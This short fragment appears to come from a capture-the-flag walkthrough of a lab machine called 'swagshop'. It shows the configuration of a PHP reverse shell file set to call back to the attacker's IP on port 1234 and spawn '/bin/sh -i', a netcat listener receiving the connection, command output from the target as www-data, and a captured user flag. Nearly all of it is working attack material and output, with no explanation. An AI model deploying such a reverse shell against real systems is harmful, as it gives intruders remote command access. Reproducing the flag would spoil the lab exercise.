inet 10.10.15.219  netmask 255.255.254.0  destination 10.10.15.219

cat php-reverse-shell.phtml
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.15.219';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

root@kali:~/Desktop# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.15.219] from ip-10-10-10-140.ap-south-1.compute.internal [10.10.10.140] 47640
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 05:08:38 up 20 min,  0 users,  load average: 0.00, 0.05, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
cat user.txt
a448877277e82f05e5ddf9f90aefbac8